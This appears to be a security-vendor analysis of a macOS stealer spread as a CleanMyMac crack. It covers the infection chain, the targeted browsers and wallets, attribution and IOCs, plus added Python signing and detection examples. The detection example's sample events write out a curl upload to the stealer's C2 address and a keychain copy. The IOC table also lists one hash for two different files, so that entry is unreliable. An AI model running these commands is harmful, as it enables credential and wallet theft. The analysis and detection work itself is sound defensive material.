![Hacker deploys macOS stealer disguised as CleanMyMac crack (Header image)](s3://crabby-images/0c8d1/0c8d103f51d5f8dcece84455e5fb352fa4196de8)
A new threat targeting macOS users has emerged. At Moonlock Lab, we discovered a malware sample that still had zero detections on VirusTotal at the time of writing, despite having been first submitted on May 17, 2024.
Two things stand out. First, this time we can tie the strain to a specific threat actor. Second, the stealer fetches its payload as an AppleScript at runtime and runs it through osascript, so the malicious logic is not in the binary on disk, which complicates static detection.
![A screenshot of VirusTotal showing 0 flags.](s3://crabby-images/77b3b/77b3b3a1c664c524e8350edfc3d994ebd894e682)
Under the hood of the macOS stealer
It’s worth noting that the AppleScript is downloaded from a fake domain at runtime and handed to osascript through a system() call. This is an old trick, and it is part of why the sample stayed hidden for so long: the script that does the stealing never has to ship inside the binary that scanners inspect.
![A screenshot of the osascript downloaded from a fake domain.](s3://crabby-images/cc59f/cc59f88657bc6cb872c53d54fca5e05bb8c5563f)
The primary payload, a Mach-O file, is distributed via DMG installers with file names such as Launcher.dmg or CleanMyMacCrack.dmg.
Given the file name, the infection most likely began with the victim downloading what they believed was a cracked app. Downloading cracked apps is a dangerous practice that we outlined in a previous article.
![An image showing the CleanMyMacCrack.dmg launcher.](s3://crabby-images/645bb/645bb749a38fd9383cd64c540ca8af965aea9d9d)
This file downloads an AppleScript from hxxps://forked-project[.]com/check_updates and runs it with osascript via a system() call.
![A screenshot of the AppleScript downloaded from forked-project[.]com.](https://moonlock.com/2024/06/4_forkedprojectcheckupdates.webp)
Notably, this version of the stealer is code-signed, something we had not observed in previous iterations.
It’s also important to mention that this time the attackers did not rely on the social-engineering Gatekeeper bypass seen in earlier installer images. Instead, the binary carries a developer signature with a Team ID. That gives defenders an identifier to pivot on when hunting for related samples, and gives Apple a certificate to revoke.
![An image from the script showing developer ID certification.](s3://crabby-images/fb935/fb935d2442f1f212e68b484f5f51beb9db773047)
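As a practitioner check for the signing observation above, here is an added example (our own code, not Moonlock's tooling or anything from the sample) that parses what codesign -dv --verbose=4 prints and classifies the signature; on macOS, check_binary() runs codesign and spctl for real. The sample outputs, paths, bundle identifier and the Team ID ABCDE12345 are constructed placeholders, not values taken from this sample.

```python
"""Signing triage: parse `codesign -dv --verbose=4` output and classify it.
Added example; the sample outputs below are constructed, not from the real sample."""
import platform
import subprocess
from typing import Dict, Optional, Tuple


def parse_codesign(text: str) -> Dict[str, str]:
    """Turn codesign's key=value lines into a dict. codesign writes them to stderr;
    repeated keys (the Authority= chain) are joined in order with ' | '."""
    info: Dict[str, str] = {}
    for line in text.splitlines():
        key, sep, val = line.partition("=")
        if not sep:
            continue
        key, val = key.strip(), val.strip()
        info[key] = f"{info[key]} | {val}" if key in info else val
    return info


def classify(info: Dict[str, str]) -> Tuple[str, Optional[str]]:
    """Return (kind, team_id) with kind in: unsigned, adhoc, developer-id, apple, other-ca.
    Only Developer ID / Apple chains carry a Team ID worth pivoting on."""
    if not info:
        return ("unsigned", None)
    if info.get("Signature") == "adhoc":          # ad-hoc: no certificate, no identity
        return ("adhoc", None)
    team = info.get("TeamIdentifier")
    if team in (None, "not set"):
        team = None
    chain = info.get("Authority", "")
    if "Developer ID Application" in chain:
        return ("developer-id", team)
    if "Apple Mac OS Application Signing" in chain or chain.startswith("Software Signing"):
        return ("apple", team)
    return ("other-ca", team)


def check_binary(path: str) -> Tuple[str, Optional[str], str]:
    """macOS only: run codesign and spctl, return (kind, team_id, gatekeeper_verdict).
    codesign -dv does not consult revocation; spctl does, so a Developer ID binary
    that Apple has since revoked comes back as developer-id + 'rejected'."""
    if platform.system() != "Darwin":
        raise RuntimeError("codesign/spctl are macOS-only")
    cs = subprocess.run(["codesign", "-dv", "--verbose=4", path], capture_output=True, text=True)
    info = {} if "not signed at all" in cs.stderr else parse_codesign(cs.stderr)
    kind, team = classify(info)
    sp = subprocess.run(["spctl", "-a", "-vv", path], capture_output=True, text=True)
    verdict = "accepted" if "accepted" in (sp.stdout + sp.stderr) else "rejected"
    return kind, team, verdict


# Constructed output in the shape codesign emits. Paths, identifier and Team ID are
# placeholders (assumptions for the example), not the sample's real values.
SAMPLE_DEVID = """\
Executable=/Volumes/Launcher/Launcher
Identifier=com.example.launcher
Format=Mach-O thin (x86_64)
CodeDirectory v=20400 size=1420 flags=0x10000(runtime) hashes=35+7 location=embedded
Signature size=8968
Authority=Developer ID Application: Example Corp (ABCDE12345)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=May 16, 2024 at 10:00:00
Info.plist=not bound
TeamIdentifier=ABCDE12345
Sealed Resources=none
Internal requirements count=1 size=172
"""

SAMPLE_ADHOC = """\
Executable=/private/tmp/dropper
Identifier=dropper
Format=Mach-O thin (arm64)
CodeDirectory v=20400 size=412 flags=0x2(adhoc) hashes=7+2 location=embedded
Signature=adhoc
Info.plist=not bound
TeamIdentifier=not set
Sealed Resources=none
Internal requirements count=0 size=12
"""

if __name__ == "__main__":
    print(classify(parse_codesign(SAMPLE_DEVID)))   # ('developer-id', 'ABCDE12345')
    print(classify(parse_codesign(SAMPLE_ADHOC)))   # ('adhoc', None)
```

The TeamIdentifier is the useful pivot: once you have it from a sample, search your telemetry and sandbox corpus for other Mach-O files signed under the same Team ID. Note that codesign alone will keep reporting a clean Developer ID chain after Apple revokes the certificate; only spctl's verdict reflects the revocation.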
The script sets up directories and paths, verifies user credentials, and collects data from browsers, files, and system information. It then transmits the collected data to a server using curl.
A close examination of the stealer’s script reveals the specific browsers and cryptocurrency wallets it targets.
![A screenshot revealing the browsers and crypto wallets targeted by the script.](s3://crabby-images/c2e45/c2e451946b3cf38cd0f8ce1cd6c2f0044564dfa1)
How the script works
Here is a detailed breakdown of what the script does:
- Collects user information: The script retrieves the current username with the AppleScript command system attribute "USER", then stores the username and the paths derived from it for later operations.
- Sets up directories: The script creates a temporary directory to store the stolen data before exfiltration.
- Extracts browser data: Several browsers are targeted by the script to collect sensitive information. This information includes browsing history, cookies, saved passwords, and other user data. Targeted browsers include Google Chrome, Brave, Microsoft Edge, Vivaldi, Opera, OperaGX, and Firefox.
- Extracts cryptocurrency wallet data: A key function of the script is to identify and access directories where popular cryptocurrency wallets store their data. From there, it can steal wallet files, potentially allowing the attacker to access the victim’s crypto assets. Wallets targeted include Electrum, Coinomi, Exodus, Atomic Wallet, Wasabi Wallet, Ledger Live, Feather (Monero), Bitcoin Core, Litecoin Core, Dash Core, Electrum-LTC, Electron Cash, Guarda Wallet, Dogecoin Core, Binance, and TonKeeper.
- Collects specific files and data: The script copies the login.keychain-db file, which contains macOS keychain data, potentially including passwords and other sensitive credentials. It also grabs data from the Apple Notes application, extracting NoteStore.sqlite and associated files. Plus, it steals cookies from Safari by accessing Cookies.binarycookies.
- Gathers general user information: Alongside the files, the script collects system details and other metadata about the user and the machine.
- Exfiltrates data: Once collection is done, the script compresses the collected files into an archive ready for exfiltration.
After all this, the script calls its send_data(writemind) function, which posts the collected data to the attacker’s server at hxxp://79[.]137[.]192[.]4/p2p.
![An image of the send_data(writemind) script function.](s3://crabby-images/07f6f/07f6f4fe63141d60ee66150cf0a5284f2868d691)
Infection chain
The infection chain begins when a user visits a pirated-software site and downloads a file named CleanMyMacCrack.dmg, believing it to be a cracked version of CleanMyMac. When the app inside the DMG is launched, a Mach-O file executes and downloads an AppleScript from hxxps://forked-project[.]com/check_updates. The AppleScript is run via a system() call and creates a temporary directory for data collection. It then steals sensitive information, including browser cookies, passwords, and cryptocurrency wallet data. Finally, the stolen data is compressed and sent to a command-and-control (C2) server at hxxp://79[.]137[.]192[.]4/p2p.
![Infection chain for the macOS stealer disguised as a CleanMyMac crack](s3://crabby-images/4cc28/4cc2874c5ea1e6c7a9c3ff3204f6cede6a807970)
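To turn the chain above (and the script breakdown in the previous section) into something a SOC can run, here is an added example of our own, not Moonlock's or the actor's code: a small triage pass over constructed endpoint events in the shape an EDR or Endpoint Security feed might emit. It flags three behaviours the page describes: a shell spawned from a binary on a mounted disk image that runs osascript, an osascript-descended process reading the keychain, Notes store or Safari cookies, and an osascript-descended curl upload to a bare-IP URL. The process tree, user name, temporary paths and command lines are illustrative assumptions; the only page-derived specifics are the copied file names and the C2 URL.

```python
"""Toy detection pass over constructed endpoint events mirroring the described chain.
Added example; event shape and command lines are illustrative, not the sample's."""
import os
import re
from typing import Dict, Iterator, List

# File names the page says the script copies (keychain, Apple Notes, Safari cookies).
SENSITIVE_BASENAMES = {"login.keychain-db", "NoteStore.sqlite", "Cookies.binarycookies"}

# curl options that send a request body or upload a file.
CURL_UPLOAD_OPTS = {"-d", "--data", "--data-binary", "--data-raw", "--data-urlencode",
                    "-F", "--form", "-T", "--upload-file"}

# http(s)://<dotted quad>[:port]/... : the C2 here is a bare IP, not a hostname.
RAW_IP_URL = re.compile(r"^https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:/|$)")

SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}


def _lineage(procs: Dict[int, dict], pid: int) -> Iterator[dict]:
    """Yield the exec event for pid and each ancestor, following ppid links."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        ev = procs[pid]
        yield ev
        pid = ev["ppid"]


def _under_osascript(procs: Dict[int, dict], pid: int) -> bool:
    return any(os.path.basename(ev["exe"]) == "osascript" for ev in _lineage(procs, pid))


def triage(events: List[dict]) -> List[str]:
    """Return one alert string per suspicious event, in event order."""
    procs = {e["pid"]: e for e in events if e["type"] == "exec"}
    alerts: List[str] = []
    for e in events:
        if e["type"] == "exec":
            exe, argv = e["exe"], e["argv"]
            parent = procs.get(e["ppid"])
            # Rule 1: system("osascript ...") from a binary running off a mounted disk
            # image appears as /bin/sh -c "<cmd>" whose parent lives under /Volumes/.
            if (exe in SHELLS and len(argv) >= 3 and argv[1] == "-c"
                    and "osascript" in argv[2]
                    and parent is not None and parent["exe"].startswith("/Volumes/")):
                alerts.append(f"pid {e['pid']}: osascript run via shell by DMG-hosted {parent['exe']}")
            # Rule 2: curl uploading data to a bare-IP URL, with osascript in its ancestry.
            if os.path.basename(exe) == "curl":
                uploads = any(a.split("=", 1)[0] in CURL_UPLOAD_OPTS for a in argv[1:])
                url = next((a for a in argv[1:] if RAW_IP_URL.match(a)), None)
                if uploads and url and _under_osascript(procs, e["ppid"]):
                    alerts.append(f"pid {e['pid']}: osascript-descended curl upload to {url}")
        elif e["type"] == "file_open":
            # Rule 3: osascript lineage touching the keychain, Notes store or Safari cookies.
            if os.path.basename(e["path"]) in SENSITIVE_BASENAMES and _under_osascript(procs, e["pid"]):
                alerts.append(f"pid {e['pid']}: osascript-descended read of {e['path']}")
    return alerts


# Constructed events (assumed process tree, user, paths and command lines).
EVENTS = [
    {"type": "exec", "pid": 501, "ppid": 1, "exe": "/Volumes/CleanMyMacCrack/CleanMyMacCrack",
     "argv": ["/Volumes/CleanMyMacCrack/CleanMyMacCrack"]},
    {"type": "exec", "pid": 502, "ppid": 501, "exe": "/bin/sh",
     "argv": ["sh", "-c", "osascript /private/tmp/update.scpt"]},
    {"type": "exec", "pid": 503, "ppid": 502, "exe": "/usr/bin/osascript",
     "argv": ["osascript", "/private/tmp/update.scpt"]},
    {"type": "exec", "pid": 504, "ppid": 503, "exe": "/bin/sh",
     "argv": ["sh", "-c", "cp /Users/alice/Library/Keychains/login.keychain-db /private/tmp/out/"]},
    {"type": "exec", "pid": 505, "ppid": 504, "exe": "/bin/cp",
     "argv": ["cp", "/Users/alice/Library/Keychains/login.keychain-db", "/private/tmp/out/"]},
    {"type": "file_open", "pid": 505, "path": "/Users/alice/Library/Keychains/login.keychain-db"},
    {"type": "exec", "pid": 506, "ppid": 503, "exe": "/bin/sh",
     "argv": ["sh", "-c", "curl -F file=@/private/tmp/out.zip http://79.137.192.4/p2p"]},
    {"type": "exec", "pid": 507, "ppid": 506, "exe": "/usr/bin/curl",
     "argv": ["curl", "-F", "file=@/private/tmp/out.zip", "http://79.137.192.4/p2p"]},
    # Benign noise: a user's own shell posting to a hostname, no disk image, no osascript.
    {"type": "exec", "pid": 600, "ppid": 1,
     "exe": "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "argv": ["Terminal"]},
    {"type": "exec", "pid": 601, "ppid": 600, "exe": "/bin/zsh",
     "argv": ["zsh", "-c", "curl -d a=1 https://example.com/api"]},
    {"type": "exec", "pid": 602, "ppid": 601, "exe": "/usr/bin/curl",
     "argv": ["curl", "-d", "a=1", "https://example.com/api"]},
]

if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(alert)
```

Run against the constructed feed, the pass raises three alerts (the shell that launches osascript, the keychain read, and the curl upload to the bare IP) and stays quiet on the benign curl. The lineage walk is what keeps the rules cheap: none of them needs the script's contents, only who spawned whom and what was touched.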
Attribution
This stealer is allegedly linked to Rodrigo4, a notorious Russian-speaking threat actor active on the XSS underground forum. In a post on XSS, Rodrigo4 was seen seeking partners to distribute the stealer through SEO manipulation and Google Ads, suggesting this as their possible method of distribution.
![A screenshot of a post by Rodrigo4 on XSS.](s3://crabby-images/c54dc/c54dc168d4dc338ce6fdedf70a3beba3ff4b5603)
Moonlock Lab observed that the stealer communicates with its command-and-control (C2) server at hxxp://79[.]137[.]192[.]4. Investigating this IP address revealed an authorization form at hxxp://79[.]137[.]192[.]4/login/. The form closely resembles the ones shown in Rodrigo4’s advertisements on the XSS forum, suggesting a direct connection to the threat actor.
![A screenshot of the authorization form linked to Rodrigo4.](s3://crabby-images/cd732/cd732e01acba52744b3faf90d1bfd3b4421a39fe)
![An image showing the total statistics for the threat actor linked to the macOS stealer.](s3://crabby-images/3a202/3a202853431a1eba5b4cba924b85505b38073f46)
![An image showing more known details about the threat actor linked to the macOS stealer.](s3://crabby-images/b6ff8/b6ff8cf02f3558e775b9e3cbf6e4b612f0771033)
Further, we discovered a logo associated with Rodrigo4 hosted on the server (hxxp://79[.]137[.]192[.]4/assets), providing additional evidence of this link.
![A screenshot of the assets page on the server under investigation.](s3://crabby-images/e00ff/e00ff6abff48941914dad719c3885bbfb30529e8)
![A browser window showing a logo potentially linked to Rodrigo4, discovered on the server under investigation.](s3://crabby-images/b76b3/b76b3abbc6c53f15ac2c07cf00f771f988215820)
Our findings were bolstered by the observations of @birchb0y, a senior detection engineer at Huntress, who pointed out that this payload has become increasingly common among Atomic Stealer variants over the past six months.
Pivoting on 79[.]137[.]192[.]4 in URLScan.io surfaced related URLs such as rodrigos[.]io, whose A record points to 185[.]172[.]128[.]72, an address that also hosts a cluster of crypto-themed domains.
![A screenshot of the post by user @birchb0y about the macOS stealer.](s3://crabby-images/e08b0/e08b049a0ea6148dcbcf3da086903428b457b57c)
![A screenshot of a post by @birchb0y related to Atomic Stealer.](s3://crabby-images/33605/33605097302b60efc12462422646df5d4cf1ab57)
Conclusion
The discovery of this hidden stealer strain highlights the growing diversity of threats aimed at macOS. Linked to the known threat actor Rodrigo4, and relying on a runtime-fetched AppleScript and a valid code signature to stay under the radar, this malware poses a real danger to macOS users.
Here are several tips to help you protect yourself from this macOS malware:
- Be cautious with downloads: Only download software from trusted sources, such as the official App Store or verified websites. Also, avoid clicking on suspicious links or email attachments.
- Keep software updated: Always install the latest updates for macOS and your applications. Updates often include security patches for known vulnerabilities.
- Use security software: Use reputable anti-malware software, such as CleanMyMac X powered by Moonlock Engine, and regularly scan your system for threats.
Indicators of Compromise (IOC)
| Indicator | Indicator Type | Description |
| --- | --- | --- |
| 30b89622c779dd06faa909e7e0b8e88f3b75ca78fad00c4cf0ef7db320e3b218 | SHA256 | Mach-O |
| 30b89622c779dd06faa909e7e0b8e88f3b75ca78fad00c4cf0ef7db320e3b218 | SHA256 | DMG |
| 79[.]137[.]192[.]4 | IP | Atomic Stealer C2 |
| 109[.]120[.]178[.]3 | IP | Atomic Stealer C2 |
| pixelcommunity[.]xyz | Domain | Associated domain |
| newparadigm[.]dev | Domain | Associated domain |
| mantanetwork[.]dev | Domain | Associated domain |
| rodrigos[.]io | Domain | Associated domain |
| altllayer[.]com | Domain | Associated domain |
| lfgjupiter[.]com | Domain | Associated domain |
| earlymodenetwork[.]com | Domain | Associated domain |
| leaderwallets[.]org | Domain | Associated domain |
| hxxps://forked-project[.]com/check_updates | URL | Payload URL |
| hxxps://xss[.]is/threads/97296/ | URL | Rodrigo4 post on XSS |